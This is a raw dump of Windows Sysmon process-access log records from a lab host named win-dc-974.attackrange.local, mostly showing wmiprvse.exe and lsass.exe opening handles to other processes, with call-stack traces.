16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 